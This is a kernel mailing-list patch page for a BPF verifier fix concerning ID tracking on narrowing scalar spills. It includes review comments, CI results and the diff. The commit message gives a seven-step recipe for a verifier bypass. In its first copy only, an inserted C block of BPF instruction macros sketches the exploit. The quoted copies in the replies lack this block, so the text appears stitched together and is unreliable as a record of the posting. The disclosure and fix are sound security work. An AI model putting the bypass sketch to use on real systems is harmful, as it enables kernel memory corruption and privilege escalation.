diff mbox series

[bpf,v3,1/2] bpf: Fix verifier tracking scalars on spill

Message ID 20230606214246.403579-2-maxtram95@gmail.com (mailing list archive)
State Changes Requested
Delegated to: BPF
Headers show
Series Fix BPF verifier bypass on scalar spill | expand

Checks

Context Check Description
bpf/vmtest-bpf-VM_Test-1 success Logs for ShellCheck
bpf/vmtest-bpf-VM_Test-2 success Logs for build for aarch64 with gcc
bpf/vmtest-bpf-VM_Test-3 success Logs for build for s390x with gcc
bpf/vmtest-bpf-VM_Test-4 success Logs for build for x86_64 with gcc
bpf/vmtest-bpf-VM_Test-5 success Logs for build for x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-6 success Logs for set-matrix
bpf/vmtest-bpf-VM_Test-7 success Logs for test_maps on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-8 success Logs for test_maps on s390x with gcc
bpf/vmtest-bpf-VM_Test-9 success Logs for test_maps on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-10 success Logs for test_maps on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-11 success Logs for test_progs on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-12 success Logs for test_progs on s390x with gcc
bpf/vmtest-bpf-VM_Test-13 success Logs for test_progs on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-14 success Logs for test_progs on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-15 success Logs for test_progs_no_alu32 on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-16 success Logs for test_progs_no_alu32 on s390x with gcc
bpf/vmtest-bpf-VM_Test-17 success Logs for test_progs_no_alu32 on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-18 success Logs for test_progs_no_alu32 on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-19 success Logs for test_progs_no_alu32_parallel on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-20 success Logs for test_progs_no_alu32_parallel on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-21 success Logs for test_progs_no_alu32_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-22 success Logs for test_progs_parallel on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-23 success Logs for test_progs_parallel on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-24 success Logs for test_progs_parallel on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-25 success Logs for test_verifier on aarch64 with gcc
bpf/vmtest-bpf-VM_Test-26 success Logs for test_verifier on s390x with gcc
bpf/vmtest-bpf-VM_Test-27 success Logs for test_verifier on x86_64 with gcc
bpf/vmtest-bpf-VM_Test-28 success Logs for test_verifier on x86_64 with llvm-16
bpf/vmtest-bpf-VM_Test-29 success Logs for veristat
bpf/vmtest-bpf-PR success PR summary
netdev/series_format success Posting correctly formatted
netdev/tree_selection success Clearly marked for bpf
netdev/fixes_present success Fixes tag present in non-next series
netdev/header_inline success No static functions without inline keyword in header files
netdev/build_32bit success Errors and warnings before: 20 this patch: 20
netdev/cc_maintainers success CCed 12 of 12 maintainers
netdev/build_clang success Errors and warnings before: 8 this patch: 8
netdev/verify_signedoff success Signed-off-by tag matches author and committer
netdev/deprecated_api success None detected
netdev/check_selftest success No net selftest shell script
netdev/verify_fixes success Fixes tag looks correct
netdev/build_allmodconfig_warn success Errors and warnings before: 20 this patch: 20
netdev/checkpatch success total: 0 errors, 0 warnings, 0 checks, 20 lines checked
netdev/kdoc success Errors and warnings before: 0 this patch: 0
netdev/source_inline success Was 0 now: 0

Commit Message

Maxim Mikityanskiy June 6, 2023, 9:42 p.m. UTC
From: Maxim Mikityanskiy <maxim@isovalent.com>

The following scenario describes a verifier bypass in privileged mode
(CAP_BPF or CAP_SYS_ADMIN):

1. Prepare a 32-bit rogue number.
2. Put the rogue number into the upper half of a 64-bit register, and
   roll a random (unknown to the verifier) bit in the lower half. The
   rest of the bits should be zero (although variations are possible).
3. Assign an ID to the register by MOVing it to another arbitrary
   register.
4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
   another register. Due to a bug in the verifier, the ID will be
   preserved, although the new register will contain only the lower 32
   bits, i.e. all zeros except one random bit.

At this point there are two registers with different values but the same
ID, which means the integrity of the verifier state has been corrupted.
Next steps show the actual bypass:

5. Compare the new 32-bit register with 0. In the branch where it's
   equal to 0, the verifier will believe that the original 64-bit
   register is also 0, because it has the same ID, but its actual value
   still contains the rogue number in the upper half.
   Some optimizations of the verifier prevent the actual bypass, so
   extra care is needed: the comparison must be between two registers,
   and both branches must be reachable (this is why one random bit is
   needed). Both branches are still suitable for the bypass.
6. Right shift the original register by 32 bits to pop the rogue number.
7. Use the rogue number as an offset with any pointer. The verifier will
   believe that the offset is 0, while in reality it's the given number.
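The steps above can be sketched in test_verifier-style BPF instruction macros. This is an illustrative fragment only, not the author's actual reproducer: the 0xdead constant, the register choices, and the jump offset are all hypothetical, and the surrounding program (context pointer in r1, a valid pointer in r3) is assumed.

```c
/* Steps 1-2: rogue number in the upper half, one unknown bit below. */
BPF_MOV32_IMM(BPF_REG_6, 0xdead),             /* hypothetical rogue number */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32),
BPF_LDX_MEM(BPF_W, BPF_REG_7, BPF_REG_1, 0),  /* value unknown to the verifier */
BPF_ALU64_IMM(BPF_AND, BPF_REG_7, 1),         /* keep a single random bit */
BPF_ALU64_REG(BPF_OR, BPF_REG_6, BPF_REG_7),
/* Step 3: MOV assigns the same ID to r6 and r8. */
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
/* Step 4: 32-bit spill and fill; the buggy verifier keeps the ID on r9. */
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_8, -8),
BPF_LDX_MEM(BPF_W, BPF_REG_9, BPF_REG_10, -8),
/* Step 5: reg-reg compare against a known zero; in the fallthrough branch
 * the verifier wrongly concludes r6/r8 == 0 via the shared ID.
 */
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_JMP_REG(BPF_JNE, BPF_REG_9, BPF_REG_2, 2), /* illustrative offset */
/* Step 6: pop the rogue number the verifier believes is 0. */
BPF_ALU64_IMM(BPF_RSH, BPF_REG_8, 32),
/* Step 7: use it as a pointer offset the verifier treats as 0. */
BPF_ALU64_REG(BPF_ADD, BPF_REG_3, BPF_REG_8),
```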

The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
SCALAR_VALUE. If the spill is narrowing the actual register value, don't
keep the ID, make sure it's reset to 0.

Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>
---
 kernel/bpf/verifier.c | 7 +++++++
 1 file changed, 7 insertions(+)

Comments

Yonghong Song June 7, 2023, 1:32 a.m. UTC | #1
On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> From: Maxim Mikityanskiy <maxim@isovalent.com>
> 
> The following scenario describes a verifier bypass in privileged mode
> (CAP_BPF or CAP_SYS_ADMIN):
> 
> 1. Prepare a 32-bit rogue number.
> 2. Put the rogue number into the upper half of a 64-bit register, and
>     roll a random (unknown to the verifier) bit in the lower half. The
>     rest of the bits should be zero (although variations are possible).
> 3. Assign an ID to the register by MOVing it to another arbitrary
>     register.
> 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
>     another register. Due to a bug in the verifier, the ID will be
>     preserved, although the new register will contain only the lower 32
>     bits, i.e. all zeros except one random bit.
> 
> At this point there are two registers with different values but the same
> ID, which means the integrity of the verifier state has been corrupted.
> Next steps show the actual bypass:
> 
> 5. Compare the new 32-bit register with 0. In the branch where it's
>     equal to 0, the verifier will believe that the original 64-bit
>     register is also 0, because it has the same ID, but its actual value
>     still contains the rogue number in the upper half.
>     Some optimizations of the verifier prevent the actual bypass, so
>     extra care is needed: the comparison must be between two registers,
>     and both branches must be reachable (this is why one random bit is
>     needed). Both branches are still suitable for the bypass.
> 6. Right shift the original register by 32 bits to pop the rogue number.
> 7. Use the rogue number as an offset with any pointer. The verifier will
>     believe that the offset is 0, while in reality it's the given number.
> 
> The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> keep the ID, make sure it's reset to 0.
> 
> Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>

LGTM with a small nit below.

Acked-by: Yonghong Song <yhs@fb.com>

> ---
>   kernel/bpf/verifier.c | 7 +++++++
>   1 file changed, 7 insertions(+)
> 
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 5871aa78d01a..7be23eced561 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   	mark_stack_slot_scratched(env, spi);
>   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
>   	    !register_is_null(reg) && env->bpf_capable) {
> +		bool reg_value_fits;
> +
>   		if (dst_reg != BPF_REG_FP) {
>   			/* The backtracking logic can only recognize explicit
>   			 * stack slot address like [fp - 8]. Other spill of
> @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>   			if (err)
>   				return err;
>   		}
> +
> +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
>   		save_register_state(state, spi, reg, size);
> +		/* Break the relation on a narrowing spill. */
> +		if (!reg_value_fits)
> +			state->stack[spi].spilled_ptr.id = 0;

I think the code can be simplified like below:

--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
                                 return err;
                 }
                 save_register_state(state, spi, reg, size);
+               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
+                       state->stack[spi].spilled_ptr.id = 0;
         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
                    insn->imm != 0 && env->bpf_capable) {
                 struct bpf_reg_state fake_reg = {};

>   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>   		   insn->imm != 0 && env->bpf_capable) {
>   		struct bpf_reg_state fake_reg = {};
Maxim Mikityanskiy June 7, 2023, 7:36 a.m. UTC | #2
On Tue, 06 Jun 2023 at 18:32:37 -0700, Yonghong Song wrote:
> 
> 
> On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote:
> > From: Maxim Mikityanskiy <maxim@isovalent.com>
> > 
> > The following scenario describes a verifier bypass in privileged mode
> > (CAP_BPF or CAP_SYS_ADMIN):
> > 
> > 1. Prepare a 32-bit rogue number.
> > 2. Put the rogue number into the upper half of a 64-bit register, and
> >     roll a random (unknown to the verifier) bit in the lower half. The
> >     rest of the bits should be zero (although variations are possible).
> > 3. Assign an ID to the register by MOVing it to another arbitrary
> >     register.
> > 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to
> >     another register. Due to a bug in the verifier, the ID will be
> >     preserved, although the new register will contain only the lower 32
> >     bits, i.e. all zeros except one random bit.
> > 
> > At this point there are two registers with different values but the same
> > ID, which means the integrity of the verifier state has been corrupted.
> > Next steps show the actual bypass:
> > 
> > 5. Compare the new 32-bit register with 0. In the branch where it's
> >     equal to 0, the verifier will believe that the original 64-bit
> >     register is also 0, because it has the same ID, but its actual value
> >     still contains the rogue number in the upper half.
> >     Some optimizations of the verifier prevent the actual bypass, so
> >     extra care is needed: the comparison must be between two registers,
> >     and both branches must be reachable (this is why one random bit is
> >     needed). Both branches are still suitable for the bypass.
> > 6. Right shift the original register by 32 bits to pop the rogue number.
> > 7. Use the rogue number as an offset with any pointer. The verifier will
> >     believe that the offset is 0, while in reality it's the given number.
> > 
> > The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for
> > SCALAR_VALUE. If the spill is narrowing the actual register value, don't
> > keep the ID, make sure it's reset to 0.
> > 
> > Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill")
> > Signed-off-by: Maxim Mikityanskiy <maxim@isovalent.com>
> 
> LGTM with a small nit below.
> 
> Acked-by: Yonghong Song <yhs@fb.com>
> 
> > ---
> >   kernel/bpf/verifier.c | 7 +++++++
> >   1 file changed, 7 insertions(+)
> > 
> > diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> > index 5871aa78d01a..7be23eced561 100644
> > --- a/kernel/bpf/verifier.c
> > +++ b/kernel/bpf/verifier.c
> > @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   	mark_stack_slot_scratched(env, spi);
> >   	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
> >   	    !register_is_null(reg) && env->bpf_capable) {
> > +		bool reg_value_fits;
> > +
> >   		if (dst_reg != BPF_REG_FP) {
> >   			/* The backtracking logic can only recognize explicit
> >   			 * stack slot address like [fp - 8]. Other spill of
> > @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
> >   			if (err)
> >   				return err;
> >   		}
> > +
> > +		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
> >   		save_register_state(state, spi, reg, size);
> > +		/* Break the relation on a narrowing spill. */
> > +		if (!reg_value_fits)
> > +			state->stack[spi].spilled_ptr.id = 0;
> 
> I think the code can be simplified like below:
> 
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
>                                 return err;
>                 }
>                 save_register_state(state, spi, reg, size);
> +               if (fls64(reg->umax_value) > BITS_PER_BYTE * size)
> +                       state->stack[spi].spilled_ptr.id = 0;
>         } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
>                    insn->imm != 0 && env->bpf_capable) {
>                 struct bpf_reg_state fake_reg = {};
> 

That's true, I kept the variable to avoid churn when I send a follow-up
improvement:

+               /* Make sure that reg had an ID to build a relation on spill. */
+               if (reg_value_fits && !reg->id)
+                       reg->id = ++env->id_gen;
                save_register_state(state, spi, reg, size);

But yeah, I agree, let's simplify it for now; there is no guarantee that
the follow-up patch will be accepted as is. Thanks for the review!

> >   	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
> >   		   insn->imm != 0 && env->bpf_capable) {
> >   		struct bpf_reg_state fake_reg = {};
diff mbox series

Patch

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 5871aa78d01a..7be23eced561 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
 	mark_stack_slot_scratched(env, spi);
 	if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) &&
 	    !register_is_null(reg) && env->bpf_capable) {
+		bool reg_value_fits;
+
 		if (dst_reg != BPF_REG_FP) {
 			/* The backtracking logic can only recognize explicit
 			 * stack slot address like [fp - 8]. Other spill of
@@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
 			if (err)
 				return err;
 		}
+
+		reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size;
 		save_register_state(state, spi, reg, size);
+		/* Break the relation on a narrowing spill. */
+		if (!reg_value_fits)
+			state->stack[spi].spilled_ptr.id = 0;
 	} else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) &&
 		   insn->imm != 0 && env->bpf_capable) {
 		struct bpf_reg_state fake_reg = {};